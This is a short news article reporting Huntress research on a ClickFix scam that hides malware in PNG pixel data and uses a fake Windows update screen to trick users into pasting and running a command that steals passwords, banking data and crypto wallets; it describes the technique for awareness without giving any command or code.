Scammers constantly develop new methods to seize users' data by inventing unusual techniques. One of the most common tricks is using a fake link offering a prize or service. The newest method, however, involves stealing data through a PNG image.
When a user clicks on a PNG image containing hidden data, spyware tools are automatically activated, enabling the theft of passwords, bank account information, and cryptocurrency wallets. Researchers at Huntress uncovered this new scam technique, in which hackers deceive users by exploiting Windows. But how? Here are the details.
A New Trick That Steals Users’ Data
According to Huntress, ClickFix scammers embedded malicious code directly into the pixel data of PNG images, relying on specific color channels to reconstruct and decrypt the payload in memory—rather than the traditional method of adding malicious data to a file.
The scammers then used a fake, highly convincing Windows update screen that imitates the latest full-screen blue Windows update interface. It displays realistic animations titled “Working on updates,” eventually leading the user to follow the usual ClickFix routine:
-
Open the Run window using Win + R
-
Paste a malicious command
-
Execute it
Once the user does this, they fall victim to a data‑stealing scheme targeting personal data, banking information, and passwords.
How Malicious Sites Are Identified
Huntress developers explained that this trick often appears as ads on web pages or as age‑verification pop-ups. Once the user clicks, the fake Windows update screen appears. Following the instructions—especially pressing Windows + R and executing the command—allows hackers to access the device's data effortlessly.
Meanwhile, the scam uses obfuscated PowerShell code to disable security tools and prevent the attack from being detected.
Post a Comment